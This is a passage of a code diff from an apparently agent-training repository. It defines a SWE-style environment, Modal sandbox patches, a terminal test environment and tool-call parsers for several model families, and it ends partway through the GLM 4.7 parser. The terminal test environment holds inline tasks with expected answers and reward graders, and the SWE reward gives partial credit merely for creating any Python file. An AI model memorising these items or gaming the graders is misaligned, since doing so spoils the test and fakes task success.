from atroposlib.type_definitions import Item
from environments.agent_loop import AgentResult
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.tool_context import ToolContext
logger = logging.getLogger(__name__)
class HermesSweEnvConfig(HermesAgentEnvConfig):
"""Config with defaults for SWE-bench style tasks."""
pass # Inherits all fields, overrides defaults in config_init
class HermesSweEnv(HermesAgentBaseEnv):
"""
SWE-bench style environment using Modal terminal backend.
The model gets a coding task, uses terminal + file + web tools to solve it,
and the reward function runs tests in the same Modal sandbox to verify.
Subclass this for specific SWE datasets (HumanEval, SWE-bench, etc.)
and customize format_prompt() and compute_reward() as needed.
"""
name = "hermes-swe"
env_config_cls = HermesSweEnvConfig
@classmethod
def config_init(cls) -> Tuple[HermesSweEnvConfig, List[APIServerConfig]]:
"""
Default configuration for the SWE environment.
Uses Modal terminal backend for cloud isolation and terminal + file + web toolsets.
"""
env_config = HermesSweEnvConfig(
# Toolsets: terminal for running code, file for reading/writing, web for docs
enabled_toolsets=["terminal", "file", "web"],
disabled_toolsets=None,
distribution=None,
# Agent settings -- SWE tasks need more turns
max_agent_turns=30,
max_token_length=4096,
agent_temperature=1.0,
system_prompt=(
"You are a skilled software engineer. You have access to a terminal, "
"file tools, and web search. Use these tools to complete the coding task. "
"Write clean, working code and verify it runs correctly before finishing."
),
# Modal backend for cloud-isolated sandboxes
terminal_backend="modal",
# Dataset -- override via CLI for your specific SWE dataset
dataset_name="bigcode/humanevalpack",
dataset_split="test",
prompt_field="prompt",
# Atropos settings
group_size=4,
tokenizer_name="NousResearch/DeepHermes-3-Llama-3-3B-Preview",
tool_call_parser="hermes",
steps_per_eval=50,
total_steps=500,
use_wandb=True,
wandb_name="hermes-swe",
)
server_configs = [
APIServerConfig(
base_url="http://localhost:8000/v1",
model_name="NousResearch/DeepHermes-3-Llama-3-3B-Preview",
server_type="openai", # Phase 1; switch to "vllm" for Phase 2
api_key="",
)
]
return env_config, server_configs
async def setup(self):
"""Load the SWE dataset."""
if self.config.dataset_name:
self.dataset = load_dataset(
self.config.dataset_name, split=self.config.dataset_split
)
else:
# Placeholder if no dataset specified
self.dataset = []
self.iter = 0
self.reward_buffer: List[float] = []
async def get_next_item(self) -> Dict[str, Any]:
"""Cycle through the SWE dataset."""
if not self.dataset:
raise ValueError("No dataset loaded. Set dataset_name in config.")
item = self.dataset[self.iter % len(self.dataset)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, Any]) -> str:
"""
Format the SWE task prompt.
Override this in subclasses for different dataset formats.
Default assumes the dataset has a 'prompt' field and optionally a 'test' field.
"""
prompt = item.get(self.config.prompt_field, "")
# If the dataset has test information, include it in the prompt
test_info = item.get("test", item.get("test_code", item.get("tests", "")))
if test_info:
prompt += f"\n\nTests to pass:\n{test_info}"
return prompt
async def compute_reward(
self, item: Dict[str, Any], result: AgentResult, ctx: ToolContext
) -> float:
"""
Score by running tests in the model's Modal sandbox.
Default implementation:
- If the dataset item has a 'test' or 'test_code' field, run it
- Check exit code: 0 = pass, non-zero = fail
- Partial credit for file creation
Override this in subclasses for more sophisticated reward logic.
"""
# Find the test command from the dataset item
test_code = item.get("test", item.get("test_code", item.get("tests", "")))
if test_code:
# Run the test in the model's sandbox. shlex.quote keeps the shell
# command intact when test_code itself contains quotes (common in
# Python test snippets).
test_result = ctx.terminal(
f"cd /workspace && python3 -c {shlex.quote(test_code)}", timeout=60
)
if test_result["exit_code"] == 0:
self.reward_buffer.append(1.0)
return 1.0
# Partial credit: check if the model created any Python files.
# This assumes /tmp/.start_marker was touched when the sandbox started;
# if the marker is missing, find fails and partial credit is simply skipped.
file_check = ctx.terminal("find /workspace -name '*.py' -newer /tmp/.start_marker 2>/dev/null | head -5")
if file_check["exit_code"] == 0 and file_check.get("output", "").strip():
self.reward_buffer.append(0.1)
return 0.1
self.reward_buffer.append(0.0)
return 0.0
async def evaluate(self, *args, **kwargs):
"""
Run evaluation on a held-out set.
Override for dataset-specific evaluation logic.
"""
start_time = time.time()
end_time = time.time()
eval_metrics = {"eval/placeholder": 0.0}
await self.evaluate_log(
metrics=eval_metrics,
start_time=start_time,
end_time=end_time,
)
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log SWE-specific metrics."""
if wandb_metrics is None:
wandb_metrics = {}
if self.reward_buffer:
wandb_metrics["train/avg_reward"] = sum(self.reward_buffer) / len(
self.reward_buffer
)
wandb_metrics["train/pass_rate"] = sum(
1 for r in self.reward_buffer if r == 1.0
) / len(self.reward_buffer)
self.reward_buffer = []
await super().wandb_log(wandb_metrics)
if __name__ == "__main__":
HermesSweEnv.cli()
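The class docstring invites subclassing for specific SWE datasets. As a hedged sketch of what that might look like for a pytest-style dataset (the problem_statement and test_cmd fields are assumed dataset columns, not fields HermesSweEnv guarantees):

class PytestSweEnv(HermesSweEnv):
    """Sketch: reward = whether the dataset's test command passes."""
    name = "pytest-swe"

    def format_prompt(self, item):
        return item["problem_statement"]  # assumed field name

    async def compute_reward(self, item, result, ctx):
        # Run the dataset-provided test command in the rollout's sandbox
        test = ctx.terminal(f"cd /workspace && {item['test_cmd']}", timeout=120)
        return 1.0 if test["exit_code"] == 0 else 0.0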

environments/patches.py

@@ -0,0 +1,204 @@
"""
Monkey patches for making hermes-agent tools work inside async frameworks (Atropos).
Problem:
Some tools use asyncio.run() internally (e.g., mini-swe-agent's Modal backend,
web_extract). This crashes when called from inside Atropos's event loop because
asyncio.run() can't be nested.
Solution:
Replace the problematic methods with versions that use a dedicated background
thread with its own event loop. The calling code sees the same sync interface --
call a function, get a result -- but internally the async work happens on a
separate thread that doesn't conflict with Atropos's loop.
These patches are safe for normal CLI use too: when there's no running event
loop, the behavior is identical (the background thread approach works regardless).
What gets patched:
- SwerexModalEnvironment.__init__ -- creates Modal deployment on a background thread
- SwerexModalEnvironment.execute -- runs commands on the same background thread
- SwerexModalEnvironment.stop -- stops deployment on the background thread
Usage:
Call apply_patches() once at import time (done automatically by hermes_base_env.py).
This is idempotent -- calling it multiple times is safe.
"""
import asyncio
import logging
import threading
from typing import Any, Optional
logger = logging.getLogger(__name__)
_patches_applied = False
class _AsyncWorker:
"""
A dedicated background thread with its own event loop.
Allows sync code to submit async coroutines and block for results,
even when called from inside another running event loop. Used to
bridge sync tool interfaces with async backends (Modal, SWE-ReX).
"""
def __init__(self):
self._loop: Optional[asyncio.AbstractEventLoop] = None
self._thread: Optional[threading.Thread] = None
self._started = threading.Event()
def start(self):
"""Start the background event loop thread."""
self._thread = threading.Thread(target=self._run_loop, daemon=True)
self._thread.start()
self._started.wait(timeout=30)
def _run_loop(self):
"""Background thread entry point -- runs the event loop forever."""
self._loop = asyncio.new_event_loop()
asyncio.set_event_loop(self._loop)
self._started.set()
self._loop.run_forever()
def run_coroutine(self, coro, timeout=600):
"""
Submit a coroutine to the background loop and block until it completes.
Safe to call from any thread, including threads that already have
a running event loop.
"""
if self._loop is None or self._loop.is_closed():
raise RuntimeError("AsyncWorker loop is not running")
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return future.result(timeout=timeout)
def stop(self):
"""Stop the background event loop and join the thread."""
if self._loop and self._loop.is_running():
self._loop.call_soon_threadsafe(self._loop.stop)
if self._thread:
self._thread.join(timeout=10)
def _patch_swerex_modal():
"""
Monkey patch SwerexModalEnvironment to use a background thread event loop
instead of asyncio.run(). This makes it safe to call from inside Atropos's
async event loop.
The patched methods have the exact same interface and behavior -- the only
difference is HOW the async work is executed internally.
"""
try:
from minisweagent.environments.extra.swerex_modal import (
SwerexModalEnvironment,
SwerexModalEnvironmentConfig,
)
from swerex.deployment.modal import ModalDeployment
from swerex.runtime.abstract import Command as RexCommand
except ImportError:
# mini-swe-agent or swe-rex not installed -- nothing to patch
logger.debug("mini-swe-agent Modal backend not available, skipping patch")
return
# Save original methods so we can refer to config handling
_original_init = SwerexModalEnvironment.__init__
def _patched_init(self, **kwargs):
"""Patched __init__: creates Modal deployment on a background thread."""
self.config = SwerexModalEnvironmentConfig(**kwargs)
# Start a dedicated event loop thread for all Modal async operations
self._worker = _AsyncWorker()
self._worker.start()
# Pre-build a modal.Image with pip fix for Modal's legacy image builder.
# Modal requires `python -m pip` to work during image build, but some
# task images (e.g., TBLite's broken-python) have intentionally broken pip.
# Fix: remove stale pip dist-info and reinstall via ensurepip before Modal
# tries to use it. This is a no-op for images where pip already works.
import modal as _modal
image_spec = self.config.image
if isinstance(image_spec, str):
image_spec = _modal.Image.from_registry(
image_spec,
setup_dockerfile_commands=[
"RUN rm -rf /usr/local/lib/python*/site-packages/pip* 2>/dev/null; "
"python -m ensurepip --upgrade --default-pip 2>/dev/null || true",
],
)
# Create AND start the deployment entirely on the worker's loop/thread
# so all gRPC channels and async state are bound to that loop
async def _create_and_start():
deployment = ModalDeployment(
image=image_spec,
startup_timeout=self.config.startup_timeout,
runtime_timeout=self.config.runtime_timeout,
deployment_timeout=self.config.deployment_timeout,
install_pipx=self.config.install_pipx,
modal_sandbox_kwargs=self.config.modal_sandbox_kwargs,
)
await deployment.start()
return deployment
self.deployment = self._worker.run_coroutine(_create_and_start())
def _patched_execute(self, command: str, cwd: str = "", *, timeout: int | None = None) -> dict[str, Any]:
"""Patched execute: runs commands on the background thread's loop."""
async def _do_execute():
return await self.deployment.runtime.execute(
RexCommand(
command=command,
shell=True,
check=False,
cwd=cwd or self.config.cwd,
timeout=timeout or self.config.timeout,
merge_output_streams=True,
env=self.config.env if self.config.env else None,
)
)
output = self._worker.run_coroutine(_do_execute())
return {
"output": output.stdout,
"returncode": output.exit_code,
}
def _patched_stop(self):
"""Patched stop: stops deployment on the background thread, then stops the thread."""
try:
self._worker.run_coroutine(
asyncio.wait_for(self.deployment.stop(), timeout=10),
timeout=15,
)
except Exception:
pass
finally:
self._worker.stop()
# Apply the patches
SwerexModalEnvironment.__init__ = _patched_init
SwerexModalEnvironment.execute = _patched_execute
SwerexModalEnvironment.stop = _patched_stop
logger.debug("Patched SwerexModalEnvironment for async-safe operation")
def apply_patches():
"""
Apply all monkey patches needed for Atropos compatibility.
Safe to call multiple times -- patches are only applied once.
Safe for normal CLI use -- patched code works identically when
there is no running event loop.
"""
global _patches_applied
if _patches_applied:
return
_patch_swerex_modal()
_patches_applied = True
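To make the failure mode concrete, here is the bridge pattern in isolation: a standalone sketch (no Modal involved) of why asyncio.run() cannot be used inside a running loop and how _AsyncWorker sidesteps it.

import asyncio

async def backend_op():
    await asyncio.sleep(0.1)
    return "done"

async def caller_inside_loop():
    # asyncio.run(backend_op())  # would raise: "cannot be called from a running event loop"
    worker = _AsyncWorker()
    worker.start()
    try:
        # Blocks the calling thread (mirroring the sync tool interface)
        # while the coroutine runs on the worker's own loop/thread.
        print(worker.run_coroutine(backend_op()))  # -> "done"
    finally:
        worker.stop()

asyncio.run(caller_inside_loop())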


@@ -0,0 +1,34 @@
# Terminal Test Environment -- Default Configuration
#
# Simple file-creation tasks for validating the full Atropos + hermes-agent stack.
# Uses Modal terminal backend and OpenRouter (Claude) for inference.
# API keys loaded from ~/hermes-agent/.env
#
# Usage:
# run-api
# python environments/terminal_test_env/terminal_test_env.py serve \
# --config environments/terminal_test_env/default.yaml
env:
enabled_toolsets: ["terminal", "file"]
max_agent_turns: 10
max_token_length: 2048
group_size: 3
total_steps: 3
steps_per_eval: 3
terminal_backend: "modal"
tool_call_parser: "hermes"
tokenizer_name: "NousResearch/DeepHermes-3-Llama-3-3B-Preview"
ensure_scores_are_not_same: false
use_wandb: false
system_prompt: >
You are a helpful assistant with access to a terminal and file tools.
Complete the user's request by using the available tools.
Be precise and follow instructions exactly.
openai:
base_url: "https://openrouter.ai/api/v1"
model_name: "anthropic/claude-opus-4.6"
server_type: "openai"
health_check: false
# api_key loaded from OPENROUTER_API_KEY in .env


@@ -0,0 +1,292 @@
"""
TerminalTestEnv -- Simple Test Environment for Validating the Stack
A self-contained environment with inline tasks (no external dataset needed).
Each task asks the model to create a file at a known path with specific content.
The reward verifier cats the file and checks if the content matches.
Enables only terminal + file toolsets. Uses Modal terminal backend with
OpenRouter (Claude) by default.
Training tasks (3):
1. Create ~/greeting.txt with "Hello from Hermes Agent"
2. Create ~/count.txt with numbers 1-5, one per line
3. Create ~/answer.txt with the result of 123 + 456
Eval task (1):
1. Create ~/result.txt with the result of 6 * 7
Usage:
# Start Atropos API server
run-api
# Run environment (uses OpenRouter + Modal by default)
python environments/terminal_test_env.py serve
# Process mode (no run-api needed, saves to JSONL)
python environments/terminal_test_env.py process \\
--env.data_path_to_save_groups terminal_test_output.jsonl
"""
import logging
import os
import sys
import time
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple, Union
# Ensure repo root is on sys.path for imports
_repo_root = Path(__file__).resolve().parent.parent.parent
if str(_repo_root) not in sys.path:
sys.path.insert(0, str(_repo_root))
from atroposlib.envs.base import ScoredDataGroup
from atroposlib.envs.server_handling.server_manager import APIServerConfig
from atroposlib.type_definitions import Item
from environments.agent_loop import AgentResult
from environments.hermes_base_env import HermesAgentBaseEnv, HermesAgentEnvConfig
from environments.tool_context import ToolContext
logger = logging.getLogger(__name__)
# =============================================================================
# Inline task definitions -- no external dataset needed
# =============================================================================
TRAIN_TASKS = [
{
"prompt": "Create a file at ~/greeting.txt containing exactly the text: Hello from Hermes Agent",
"verify_path": "~/greeting.txt",
"expected_content": "Hello from Hermes Agent",
},
{
"prompt": "Create a file at ~/count.txt containing the numbers 1 through 5, one per line",
"verify_path": "~/count.txt",
"expected_content": "1\n2\n3\n4\n5",
},
{
"prompt": "Create a file at ~/answer.txt containing the result of 123 + 456",
"verify_path": "~/answer.txt",
"expected_content": "579",
},
]
EVAL_TASKS = [
{
"prompt": "Create a file at ~/result.txt containing the result of 6 * 7",
"verify_path": "~/result.txt",
"expected_content": "42",
},
]
class TerminalTestEnvConfig(HermesAgentEnvConfig):
"""Config with defaults suitable for terminal testing."""
pass # Inherits all fields, overrides defaults in config_init
class TerminalTestEnv(HermesAgentBaseEnv):
"""
Simple test environment with inline file-creation tasks.
All tasks follow the same pattern: "create a file at ~/X.txt with content Y".
The verifier runs `cat ~/X.txt` in the rollout's terminal and checks the output
against the expected string. Same verifier logic for all tasks.
This environment is designed to validate the full stack end-to-end:
- Agent loop executes tool calls (terminal/file)
- ToolContext provides terminal access to the reward function
- Reward function verifies file content via cat
- Scored data flows through the Atropos pipeline
"""
name = "terminal-test"
env_config_cls = TerminalTestEnvConfig
@classmethod
def config_init(cls) -> Tuple[TerminalTestEnvConfig, List[APIServerConfig]]:
"""
Default configuration for the terminal test environment.
Uses Modal terminal backend for cloud isolation and OpenRouter with
Claude for inference. API keys loaded from ~/hermes-agent/.env.
"""
env_config = TerminalTestEnvConfig(
# Terminal + file tools only
enabled_toolsets=["terminal", "file"],
disabled_toolsets=None,
distribution=None,
# Agent settings
max_agent_turns=10, # Simple tasks, don't need many turns
max_token_length=16000,
agent_temperature=1.0,
system_prompt=(
"You are a helpful assistant with access to a terminal and file tools. "
"Complete the user's request by using the available tools. "
"Be precise and follow instructions exactly."
),
# Modal terminal backend for cloud-isolated sandboxes per rollout
terminal_backend="modal",
# Atropos settings
group_size=3, # 3 rollouts per group
tokenizer_name="NousResearch/q-30b-t-h45-e1",
tool_call_parser="hermes",
steps_per_eval=3, # Eval after all 3 steps
total_steps=3, # 3 groups total (1 group per step)
use_wandb=True,
wandb_name="terminal-test",
ensure_scores_are_not_same=False, # Allow all-same scores for simple tasks
# No external dataset
dataset_name=None,
)
# OpenRouter with Claude -- API key loaded from .env (OPENROUTER_API_KEY)
server_configs = [
APIServerConfig(
base_url="https://openrouter.ai/api/v1",
model_name="anthropic/claude-opus-4.6",
server_type="openai",
api_key=os.getenv("OPENROUTER_API_KEY", ""),
health_check=False, # OpenRouter doesn't have a /health endpoint
)
]
return env_config, server_configs
async def setup(self):
"""Initialize inline task lists."""
self.train_tasks = list(TRAIN_TASKS)
self.eval_tasks = list(EVAL_TASKS)
self.iter = 0
# Track reward stats for wandb logging
self.reward_buffer: List[float] = []
async def get_next_item(self) -> Dict[str, str]:
"""Cycle through training tasks."""
item = self.train_tasks[self.iter % len(self.train_tasks)]
self.iter += 1
return item
def format_prompt(self, item: Dict[str, str]) -> str:
"""The prompt is directly in the task item."""
return item["prompt"]
async def compute_reward(
self, item: Dict[str, str], result: AgentResult, ctx: ToolContext
) -> float:
"""
Verify by cat-ing the expected file path and checking content matches.
Same verifier for all tasks -- they all write a file at a known path.
Scoring:
1.0 = exact match
0.5 = expected content is present but has extra stuff
0.0 = file doesn't exist or content doesn't match
"""
verify_result = ctx.terminal(f"cat {item['verify_path']}")
# File doesn't exist or can't be read
if verify_result["exit_code"] != 0:
self.reward_buffer.append(0.0)
return 0.0
actual = verify_result.get("output", "").strip()
expected = item["expected_content"].strip()
# Exact match
if actual == expected:
self.reward_buffer.append(1.0)
return 1.0
# Partial credit: expected content is present but has extra stuff
if expected in actual:
self.reward_buffer.append(0.5)
return 0.5
self.reward_buffer.append(0.0)
return 0.0
async def evaluate(self, *args, **kwargs):
"""
Run eval tasks as single-turn completions and log the raw samples.
Responses are recorded for inspection rather than verified here;
the full agent loop is exercised during training.
"""
start_time = time.time()
total = len(self.eval_tasks)
samples = []
for eval_item in self.eval_tasks:
try:
# For eval, we do a simple single-turn completion (not full agent loop)
# to keep eval fast. The agent loop is tested via training.
completion = await self.server.chat_completion(
messages=[
{"role": "system", "content": self.config.system_prompt or ""},
{"role": "user", "content": eval_item["prompt"]},
],
n=1,
max_tokens=self.config.max_token_length,
temperature=0.0,
split="eval",
)
response_content = (
completion.choices[0].message.content if completion.choices else ""
)
samples.append(
{
"prompt": eval_item["prompt"],
"response": response_content,
"expected": eval_item["expected_content"],
}
)
except Exception as e:
logger.error("Eval failed for item: %s", e)
samples.append(
{
"prompt": eval_item["prompt"],
"response": f"ERROR: {e}",
"expected": eval_item["expected_content"],
}
)
end_time = time.time()
eval_metrics = {
"eval/num_samples": total,
}
await self.evaluate_log(
metrics=eval_metrics,
samples=samples,
start_time=start_time,
end_time=end_time,
)
async def wandb_log(self, wandb_metrics: Optional[Dict] = None):
"""Log training metrics including reward stats and accuracy."""
if wandb_metrics is None:
wandb_metrics = {}
if self.reward_buffer:
total = len(self.reward_buffer)
correct = sum(1 for r in self.reward_buffer if r == 1.0)
partial = sum(1 for r in self.reward_buffer if r == 0.5)
wandb_metrics["train/avg_reward"] = sum(self.reward_buffer) / total
wandb_metrics["train/accuracy"] = correct / total
wandb_metrics["train/partial_match_rate"] = partial / total
wandb_metrics["train/total_rollouts"] = total
self.reward_buffer = []
await super().wandb_log(wandb_metrics)
if __name__ == "__main__":
TerminalTestEnv.cli()
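Extending the suite is just another dict with the same three keys; the shared verifier needs no changes (the values here are arbitrary examples):

TRAIN_TASKS.append(
    {
        "prompt": "Create a file at ~/date.txt containing exactly the text: 2026-01-01",
        "verify_path": "~/date.txt",
        "expected_content": "2026-01-01",
    }
)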


@@ -0,0 +1,120 @@
"""
Tool Call Parser Registry
Client-side parsers that extract structured tool_calls from raw model output text.
Used in Phase 2 (VLLM server type) where ManagedServer's /generate endpoint returns
raw text without tool call parsing.
Each parser is a standalone reimplementation of the corresponding VLLM parser's
non-streaming extract_tool_calls() logic. No VLLM dependency -- only standard library
(re, json, uuid) and openai types.
Usage:
from environments.tool_call_parsers import get_parser
parser = get_parser("hermes")
content, tool_calls = parser.parse(raw_model_output)
# content = text with tool call markup stripped
# tool_calls = list of ChatCompletionMessageToolCall objects, or None
"""
import logging
from abc import ABC, abstractmethod
from typing import Dict, List, Optional, Tuple, Type
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
)
logger = logging.getLogger(__name__)
# Type alias for parser return value
ParseResult = Tuple[Optional[str], Optional[List[ChatCompletionMessageToolCall]]]
class ToolCallParser(ABC):
"""
Base class for tool call parsers.
Each parser knows how to extract structured tool_calls from a specific
model family's raw output text format.
"""
@abstractmethod
def parse(self, text: str) -> ParseResult:
"""
Parse raw model output text for tool calls.
Args:
text: Raw decoded text from the model's completion
Returns:
Tuple of (content, tool_calls) where:
- content: text with tool call markup stripped (the message 'content' field),
or None if the entire output was tool calls
- tool_calls: list of ChatCompletionMessageToolCall objects,
or None if no tool calls were found
"""
raise NotImplementedError
# Global parser registry: name -> parser class
PARSER_REGISTRY: Dict[str, Type[ToolCallParser]] = {}
def register_parser(name: str):
"""
Decorator to register a parser class under a given name.
Usage:
@register_parser("hermes")
class HermesToolCallParser(ToolCallParser):
...
"""
def decorator(cls: Type[ToolCallParser]) -> Type[ToolCallParser]:
PARSER_REGISTRY[name] = cls
return cls
return decorator
def get_parser(name: str) -> ToolCallParser:
"""
Get a parser instance by name.
Args:
name: Parser name (e.g., "hermes", "mistral", "llama3_json")
Returns:
Instantiated parser
Raises:
KeyError: If parser name is not found in registry
"""
if name not in PARSER_REGISTRY:
available = sorted(PARSER_REGISTRY.keys())
raise KeyError(
f"Tool call parser '{name}' not found. Available parsers: {available}"
)
return PARSER_REGISTRY[name]()
def list_parsers() -> List[str]:
"""Return sorted list of registered parser names."""
return sorted(PARSER_REGISTRY.keys())
# Import all parser modules to trigger registration via @register_parser decorators
# Each module registers itself when imported
from environments.tool_call_parsers.hermes_parser import HermesToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.longcat_parser import LongcatToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.mistral_parser import MistralToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.llama_parser import LlamaToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.qwen_parser import QwenToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.deepseek_v3_parser import DeepSeekV3ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.deepseek_v3_1_parser import DeepSeekV31ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.kimi_k2_parser import KimiK2ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.glm45_parser import Glm45ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.glm47_parser import Glm47ToolCallParser # noqa: E402, F401
from environments.tool_call_parsers.qwen3_coder_parser import Qwen3CoderToolCallParser # noqa: E402, F401
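A quick end-to-end check of the registry with the Hermes format (the sample model output is invented for illustration):

from environments.tool_call_parsers import get_parser

parser = get_parser("hermes")
raw = 'Let me check.<tool_call>{"name": "get_weather", "arguments": {"city": "Paris"}}</tool_call>'
content, tool_calls = parser.parse(raw)
assert content == "Let me check."
assert tool_calls[0].function.name == "get_weather"
assert tool_calls[0].function.arguments == '{"city": "Paris"}'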


@@ -0,0 +1,72 @@
"""
DeepSeek V3.1 tool call parser.
Similar to V3 but with a slightly different format:
<tool▁call▁begin>function_name<tool▁sep>arguments<tool▁call▁end>
Note: V3 puts the type before the separator and the function name after it
(with JSON arguments in a fenced code block); V3.1 puts the name before the
separator and the raw arguments after it.
Based on VLLM's DeepSeekV31ToolParser.extract_tool_calls()
"""
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("deepseek_v3_1")
@register_parser("deepseek_v31")
class DeepSeekV31ToolCallParser(ToolCallParser):
"""
Parser for DeepSeek V3.1 tool calls.
Slightly different regex than V3: function_name comes before the separator,
arguments come after (no type field, no json code block wrapper).
"""
START_TOKEN = "<tool▁calls▁begin>"
# Regex captures: function_name, function_arguments
PATTERN = re.compile(
r"<tool▁call▁begin>(?P<function_name>.*?)<tool▁sep>(?P<function_arguments>.*?)<tool▁call▁end>",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
if self.START_TOKEN not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
func_name, func_args = match
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=func_name.strip(),
arguments=func_args.strip(),
),
)
)
if not tool_calls:
return text, None
content = text[: text.find(self.START_TOKEN)].strip()
return content if content else None, tool_calls
except Exception:
return text, None


@@ -0,0 +1,76 @@
"""
DeepSeek V3 tool call parser.
Format uses special unicode tokens:
<tool▁calls▁begin>
<tool▁call▁begin>type<tool▁sep>function_name
```json
{"arg": "value"}
```
<tool▁call▁end>
<tool▁calls▁end>
Based on VLLM's DeepSeekV3ToolParser.extract_tool_calls()
"""
import re
import uuid
from typing import List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
@register_parser("deepseek_v3")
class DeepSeekV3ToolCallParser(ToolCallParser):
"""
Parser for DeepSeek V3 tool calls.
Uses special unicode tokens with fullwidth angle brackets and block elements.
Extracts type, function name, and JSON arguments from the structured format.
"""
START_TOKEN = "<tool▁calls▁begin>"
# Regex captures: type, function_name, function_arguments.
# Non-greedy quantifiers keep multiple tool calls in one output from
# being merged into a single over-wide match.
PATTERN = re.compile(
r"<tool▁call▁begin>(?P<type>.*?)<tool▁sep>(?P<function_name>.*?)\n```json\n(?P<function_arguments>.*?)\n```<tool▁call▁end>",
re.DOTALL,
)
def parse(self, text: str) -> ParseResult:
if self.START_TOKEN not in text:
return text, None
try:
matches = self.PATTERN.findall(text)
if not matches:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matches:
tc_type, func_name, func_args = match
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=func_name.strip(),
arguments=func_args.strip(),
),
)
)
if not tool_calls:
return text, None
# Content is everything before the tool calls section
content = text[: text.find(self.START_TOKEN)].strip()
return content if content else None, tool_calls
except Exception:
return text, None


@@ -0,0 +1,109 @@
"""
GLM 4.5 (GLM-4-MoE) tool call parser.
Format uses custom arg_key/arg_value tags rather than standard JSON:
<tool_call>function_name
<arg_key>param1</arg_key><arg_value>value1</arg_value>
<arg_key>param2</arg_key><arg_value>value2</arg_value>
</tool_call>
Values are deserialized using json.loads -> ast.literal_eval -> raw string fallback.
Based on VLLM's Glm4MoeModelToolParser.extract_tool_calls()
"""
import ast
import json
import re
import uuid
from typing import Any, Dict, List, Optional
from openai.types.chat.chat_completion_message_tool_call import (
ChatCompletionMessageToolCall,
Function,
)
from environments.tool_call_parsers import ParseResult, ToolCallParser, register_parser
def _deserialize_value(value: str) -> Any:
"""
Try to deserialize a string value to its native Python type.
Attempts json.loads, then ast.literal_eval, then returns raw string.
"""
try:
return json.loads(value)
except (json.JSONDecodeError, TypeError):
pass
try:
return ast.literal_eval(value)
except (ValueError, SyntaxError, TypeError):
pass
return value
@register_parser("glm45")
class Glm45ToolCallParser(ToolCallParser):
"""
Parser for GLM 4.5 (GLM-4-MoE) tool calls.
Uses <tool_call>...</tool_call> tags with <arg_key>/<arg_value> pairs
instead of standard JSON arguments.
"""
FUNC_CALL_REGEX = re.compile(r"<tool_call>.*?</tool_call>", re.DOTALL)
FUNC_DETAIL_REGEX = re.compile(r"<tool_call>([^\n]*)\n(.*)</tool_call>", re.DOTALL)
FUNC_ARG_REGEX = re.compile(
r"<arg_key>(.*?)</arg_key>\s*<arg_value>(.*?)</arg_value>", re.DOTALL
)
START_TOKEN = "<tool_call>"
def parse(self, text: str) -> ParseResult:
if self.START_TOKEN not in text:
return text, None
try:
matched_calls = self.FUNC_CALL_REGEX.findall(text)
if not matched_calls:
return text, None
tool_calls: List[ChatCompletionMessageToolCall] = []
for match in matched_calls:
detail = self.FUNC_DETAIL_REGEX.search(match)
if not detail:
continue
func_name = detail.group(1).strip()
func_args_raw = detail.group(2)
# Parse arg_key/arg_value pairs
pairs = self.FUNC_ARG_REGEX.findall(func_args_raw) if func_args_raw else []
arg_dict: Dict[str, Any] = {}
for key, value in pairs:
arg_key = key.strip()
arg_val = _deserialize_value(value.strip())
arg_dict[arg_key] = arg_val
tool_calls.append(
ChatCompletionMessageToolCall(
id=f"call_{uuid.uuid4().hex[:8]}",
type="function",
function=Function(
name=func_name,
arguments=json.dumps(arg_dict, ensure_ascii=False),
),
)
)
if not tool_calls:
return text, None
content = text[: text.find(self.START_TOKEN)].strip()
return content if content else None, tool_calls
except Exception:
return text, None
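A worked example of the arg_key/arg_value conversion (the sample output is invented for illustration; note the numeric value is deserialized to an int):

raw = (
    "<tool_call>get_weather\n"
    "<arg_key>city</arg_key><arg_value>Paris</arg_value>\n"
    "<arg_key>days</arg_key><arg_value>3</arg_value>\n"
    "</tool_call>"
)
content, calls = Glm45ToolCallParser().parse(raw)
assert content is None  # nothing precedes the tool call
assert calls[0].function.name == "get_weather"
assert calls[0].function.arguments == '{"city": "Paris", "days": 3}'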


@@ -0,0 +1,35 @@
"""
GLM 4.7 tool call parser.
Same as GLM 4.5 but with slightly different regex patterns.
The tool_call tags may wrap differently and arg parsing handles
newlines between key/value pairs.
Based on VLLM's Glm47MoeModelToolParser (extends Glm4MoeModelToolParser).
"""
import re
from environments.tool_call_parsers import ParseResult, register_parser
from environments.tool_call_parsers.glm45_parser import Glm45ToolCallParser
@register_parser("glm47")
class Glm47ToolCallParser(Glm45ToolCallParser):
"""
Parser for GLM 4.7 tool calls.
Extends GLM 4.5 with updated regex patterns.
"""
def __init__(self):
super().__init__()
# GLM 4.7 uses a slightly different detail regex that includes
# the <tool_call> wrapper and optional arg_key content
self.FUNC_DETAIL_REGEX = re.compile(
r"<tool_call>(.*?)(<arg_key>.*?)?</tool_call>", re.DOTALL
)
# GLM 4.7 additionally tolerates a literal "\n" escape sequence (the two
# characters backslash + n) between arg_key and arg_value, on top of the
# real whitespace the GLM 4.5 pattern already allows
self.FUNC_ARG_REGEX = re.compile(
